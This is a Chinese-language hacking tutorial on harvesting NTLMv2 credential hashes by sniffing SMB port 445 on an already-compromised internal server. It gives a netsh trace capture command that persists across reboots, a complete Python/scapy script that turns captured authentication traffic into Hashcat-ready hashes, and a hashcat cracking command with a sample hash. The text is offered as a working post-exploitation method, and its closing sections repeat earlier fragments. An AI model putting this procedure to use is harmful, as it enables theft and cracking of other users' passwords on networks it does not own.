监听445端口抓取NTLMv2 Hash完整指南<\/h1>

0x00 前言<\/h2>
本教程详细讲解如何通过监听445端口抓取NTLMv2 Hash的方法。该方法适用于已控制内网一台服务器后，通过监听其445共享文件端口获取未认证SMB服务的凭证信息。<\/p>

0x01 适用场景<\/h2>

控制内网一台服务器后<\/li>
目标网络为小型局域网，工作组间互相分享文件<\/li>
获取未认证或认证过期的SMB服务凭证<\/li>

特别适用于获取文件服务器访问凭证<\/li> <\/ul>

0x02 技术原理<\/h2>

当机器访问SMB服务时，会发送用户名和NTLM v2\/v1进行认证。通过监听445端口可捕获这些认证信息。注意：<\/p>

已认证成功的用户再次访问不会重新认证<\/li>

只能获取首次认证或认证过期的连接信息<\/li> <\/ul>

0x03 Windows平台抓包方法<\/h2>
使用Windows自带的netsh trace功能，无需第三方工具。<\/p>

必要条件<\/h3>

管理员权限<\/li>

Win7、Server2008R2及以后系统(不支持Server2008)<\/li> <\/ul>

抓包命令<\/h3>

netsh trace start capture=yes persistent=yes traceFile="c:\\test\\snmp1.etl"<\/span> overwrite=yes correlation=no protocol=tcp ipv4.address=192.168.20.1 keywords=ut:authentication
<\/span><\/span><\/code><\/pre>参数说明<\/strong>：<\/p>

capture=yes<\/code>: 开启抓包功能<\/li>
persistent=yes<\/code>: 系统重启不关闭抓包<\/li>
traceFile<\/code>: 保存路径<\/li>
overwrite=yes<\/code>: 覆盖已有文件<\/li>
correlation=no<\/code>: 不收集关联事件<\/li>
protocol=tcp<\/code>: 抓取TCP协议<\/li>
ipv4.address<\/code>: 限定只抓指定IP的数据包(必须改为本机IP)<\/li>
keywords=ut:authentication<\/code>: 认证相关关键字<\/li>
<\/ul>
停止抓包<\/h3>
netsh trace stop
<\/span><\/span><\/code><\/pre>0x04 转换ETL为PCAP格式<\/h2>

使用Windows Message Analyzer打开.etl文件<\/li>
等待左下角状态变为"Ready"<\/li>
点击File → Save as → Export<\/li>
保存为.cap格式(忽略可能的警告弹窗)<\/li>
用Wireshark打开.cap文件并另存为.pcap格式<\/li>
<\/ol>
0x05 使用Python脚本提取NTLMv2 Hash<\/h2>
脚本说明<\/h3>
原脚本存在提取NTLM Hash部分偏移问题，改进后通过正则表达式3.00000000000000000000000000000000000000000000000000(.*)<\/code>匹配NTLM数据。<\/p>
#!\/usr\/bin\/env python2.7<\/span>
<\/span><\/span>import<\/span> re
<\/span><\/span>try<\/span>:
<\/span><\/span>    import<\/span> scapy.all as<\/span> scapy
<\/span><\/span>except<\/span> ImportError<\/span>:
<\/span><\/span>    import<\/span> scapy
<\/span><\/span>try<\/span>:
<\/span><\/span>    import<\/span> scapy_http.http
<\/span><\/span>except<\/span> ImportError<\/span>:
<\/span><\/span>    from<\/span> scapy.layers import<\/span> http
<\/span><\/span>
<\/span><\/span>packets =<\/span> scapy.<\/span>rdpcap('NTLM_2.pcap'<\/span>)
<\/span><\/span>Num =<\/span> 1<\/span>
<\/span><\/span>for<\/span> p in<\/span> range(len(packets)):
<\/span><\/span>    try<\/span>:
<\/span><\/span>        if<\/span> packets[p]['TCP'<\/span>].<\/span>dport ==<\/span> 445<\/span>:
<\/span><\/span>            TCPPayload =<\/span> packets[p]['Raw'<\/span>].<\/span>load
<\/span><\/span>            if<\/span> TCPPayload.<\/span>find('NTLMSSP'<\/span>) !=<\/span> -<\/span>1<\/span>:
<\/span><\/span>                if<\/span> len(TCPPayload) ><\/span> 500<\/span>:
<\/span><\/span>                    print("-Hashcat NTLMv2 No. <\/span>%s<\/span>"<\/span> %<\/span> (Num))
<\/span><\/span>                    Num =<\/span> Num +<\/span> 1<\/span>
<\/span><\/span>                    print("PacketNum: <\/span>%d<\/span>"<\/span> %<\/span> (p +<\/span> 1<\/span>))
<\/span><\/span>                    print("src: <\/span>%s<\/span>"<\/span> %<\/span> (packets[p]['IP'<\/span>].<\/span>src))
<\/span><\/span>                    print("dst: <\/span>%s<\/span>"<\/span> %<\/span> (packets[p]['IP'<\/span>].<\/span>dst))
<\/span><\/span>                    
<\/span><\/span>                    Flag =<\/span> TCPPayload.<\/span>find('NTLMSSP'<\/span>)
<\/span><\/span>                    ServerTCPPayload =<\/span> packets[p -<\/span> 1<\/span>]['Raw'<\/span>].<\/span>load
<\/span><\/span>                    ServerFlag =<\/span> ServerTCPPayload.<\/span>find('NTLMSSP'<\/span>)
<\/span><\/span>                    ServerChallenge =<\/span> ServerTCPPayload[ServerFlag +<\/span> 24<\/span>:ServerFlag +<\/span> 24<\/span> +<\/span> 8<\/span>].<\/span>encode("hex"<\/span>)
<\/span><\/span>                    print("ServerChallenge: <\/span>%s<\/span>"<\/span> %<\/span> (ServerChallenge))
<\/span><\/span>                    
<\/span><\/span>                    DomainLength1 =<\/span> int(TCPPayload[Flag +<\/span> 28<\/span>:Flag +<\/span> 28<\/span> +<\/span> 1<\/span>].<\/span>encode("hex"<\/span>), 16<\/span>)
<\/span><\/span>                    DomainLength2 =<\/span> int(TCPPayload[Flag +<\/span> 28<\/span> +<\/span> 1<\/span>:Flag +<\/span> 28<\/span> +<\/span> 1<\/span> +<\/span> 1<\/span>].<\/span>encode("hex"<\/span>), 16<\/span>) *<\/span> 256<\/span>
<\/span><\/span>                    DomainLength =<\/span> DomainLength1 +<\/span> DomainLength2
<\/span><\/span>                    DomainNameUnicode =<\/span> TCPPayload[Flag +<\/span> 88<\/span>:Flag +<\/span> 88<\/span> +<\/span> DomainLength]
<\/span><\/span>                    DomainName =<\/span> [DomainNameUnicode[i] for<\/span> i in<\/span> range(len(DomainNameUnicode)) if<\/span> i %<\/span> 2<\/span> ==<\/span> 0<\/span>]
<\/span><\/span>                    DomainName =<\/span> ''<\/span>.<\/span>join(DomainName)
<\/span><\/span>                    print("DomainName: <\/span>%s<\/span>"<\/span> %<\/span> (DomainName))
<\/span><\/span>                    
<\/span><\/span>                    UserNameLength1 =<\/span> int(TCPPayload[Flag +<\/span> 36<\/span>:Flag +<\/span> 36<\/span> +<\/span> 1<\/span>].<\/span>encode("hex"<\/span>), 16<\/span>)
<\/span><\/span>                    UserNameLength2 =<\/span> int(TCPPayload[Flag +<\/span> 36<\/span> +<\/span> 1<\/span>:Flag +<\/span> 36<\/span> +<\/span> 1<\/span> +<\/span> 1<\/span>].<\/span>encode("hex"<\/span>), 16<\/span>) *<\/span> 256<\/span>
<\/span><\/span>                    UserNameLength =<\/span> UserNameLength1 +<\/span> UserNameLength2
<\/span><\/span>                    UserNameUnicode =<\/span> TCPPayload[Flag +<\/span> 88<\/span> +<\/span> DomainLength:Flag +<\/span> 88<\/span> +<\/span> DomainLength +<\/span> UserNameLength]
<\/span><\/span>                    UserName =<\/span> [UserNameUnicode[i] for<\/span> i in<\/span> range(len(UserNameUnicode)) if<\/span> i %<\/span> 2<\/span> ==<\/span> 0<\/span>]
<\/span><\/span>                    UserName =<\/span> ''<\/span>.<\/span>join(UserName)
<\/span><\/span>                    print("UserName: <\/span>%s<\/span>"<\/span> %<\/span> (UserName))
<\/span><\/span>                    
<\/span><\/span>                    NTLMResPonseLength1 =<\/span> int(TCPPayload[Flag +<\/span> 20<\/span>:Flag +<\/span> 20<\/span> +<\/span> 1<\/span>].<\/span>encode("hex"<\/span>), 16<\/span>)
<\/span><\/span>                    NTLMResPonseLength2 =<\/span> int(TCPPayload[Flag +<\/span> 20<\/span> +<\/span> 1<\/span>:Flag +<\/span> 20<\/span> +<\/span> 1<\/span> +<\/span> 1<\/span>].<\/span>encode("hex"<\/span>), 16<\/span>) *<\/span> 256<\/span>
<\/span><\/span>                    NTLMResPonseLength =<\/span> NTLMResPonseLength1 +<\/span> NTLMResPonseLength2
<\/span><\/span>                    NTLMResPonse =<\/span> TCPPayload[Flag +<\/span> 140<\/span>:Flag +<\/span> 140<\/span> +<\/span> NTLMResPonseLength].<\/span>encode("hex"<\/span>)
<\/span><\/span>                    NTLMZONG =<\/span> packets[p]['Raw'<\/span>].<\/span>load.<\/span>encode("hex"<\/span>)
<\/span><\/span>                    NTLM_FINDALL =<\/span> re.<\/span>findall('3.00000000000000000000000000000000000000000000000000(.*)'<\/span>, NTLMZONG)
<\/span><\/span>                    
<\/span><\/span>                    print("Hashcat NTLMv2:"<\/span>)
<\/span><\/span>                    print("<\/span>%s<\/span>::<\/span>%s<\/span>:<\/span>%s<\/span>:<\/span>%s<\/span>:<\/span>%s<\/span>"<\/span> %<\/span> (UserName, DomainName, ServerChallenge, NTLM_FINDALL[0<\/span>][:32<\/span>], NTLM_FINDALL[0<\/span>][32<\/span>:632<\/span>]))
<\/span><\/span>    except<\/span>:
<\/span><\/span>        pass<\/span>
<\/span><\/span><\/code><\/pre>0x06 使用Hashcat破解NTLMv2 Hash<\/h2>
破解命令<\/h3>
hashcat -m 5600<\/span> Administrator::BJ:c3e0054e464f07fa:ee783fa6e8ceff8cb08471f197e65bc6:01010000000000007db2d91678bdd601d89d32f40af504700000000002000a004800410043004b00450001000800570049004e00370004001a006800610063006b0065002e0074006500730074006c006100620003002400770069006e0037002e006800610063006b0065002e0074006500730074006c006100620005001a006800610063006b0065002e0074006500730074006c0061006200070008007db2d91678bdd601060004000200000008003000300000000000000000000000003000004a8fe7c7179152d990b897f672c25cefa677f387edc9f732008c32632721ff420a001000000000000000000000000000000000000900260063006900660073002f003100390032002e003100360038002e00320030002e00310034003100000000000000000000000000 password.list -o found.txt --force
<\/span><\/span><\/code><\/pre>参数说明<\/strong>：<\/p>

-m 5600<\/code>: 指定NTLMv2破解模式<\/li>
password.list<\/code>: 密码字典文件<\/li>
-o found.txt<\/code>: 输出结果文件<\/li>
--force<\/code>: 强制运行<\/li>
<\/ul>
0x07 注意事项<\/h2>

确保netsh trace命令中的ipv4.address参数设置为正确的本机IP<\/li>
转换格式时使用.etl文件而非.cab文件<\/li>
正则表达式可能需要根据实际情况调整<\/li>
NTLMv1和NTLMv2的破解方式不同，需使用对应模式<\/li>
<\/ol>
0x08 参考链接<\/h2>

原文参考: https:\/\/xz.aliyun.com\/t\/1945<\/li>
Windows Message Analyzer下载: https:\/\/pan.baidu.com\/s\/1dE1pM2d<\/li>
<\/ul>

监听445端口抓取NTLMv2 Hash完整指南<\/h1>

0x00 前言<\/h2> 本教程详细讲解如何通过监听445端口抓取NTLMv2 Hash的方法。该方法适用于已控制内网一台服务器后，通过监听其445共享文件端口获取未认证SMB服务的凭证信息。<\/p>

0x03 Windows平台抓包方法<\/h2> 使用Windows自带的netsh trace功能，无需第三方工具。<\/p>

0x05 使用Python脚本提取NTLMv2 Hash<\/h2>

0x06 使用Hashcat破解NTLMv2 Hash<\/h2>

0x08 参考链接<\/h2> 原文参考: https:\/\/xz.aliyun.com\/t\/1945<\/li> Windows Message Analyzer下载: https:\/\/pan.baidu.com\/s\/1dE1pM2d<\/li> <\/ul>

0x00 前言<\/h2>
本教程详细讲解如何通过监听445端口抓取NTLMv2 Hash的方法。该方法适用于已控制内网一台服务器后，通过监听其445共享文件端口获取未认证SMB服务的凭证信息。<\/p>

0x03 Windows平台抓包方法<\/h2>
使用Windows自带的netsh trace功能，无需第三方工具。<\/p>

0x08 参考链接<\/h2>

原文参考: https:\/\/xz.aliyun.com\/t\/1945<\/li>
Windows Message Analyzer下载: https:\/\/pan.baidu.com\/s\/1dE1pM2d<\/li> <\/ul>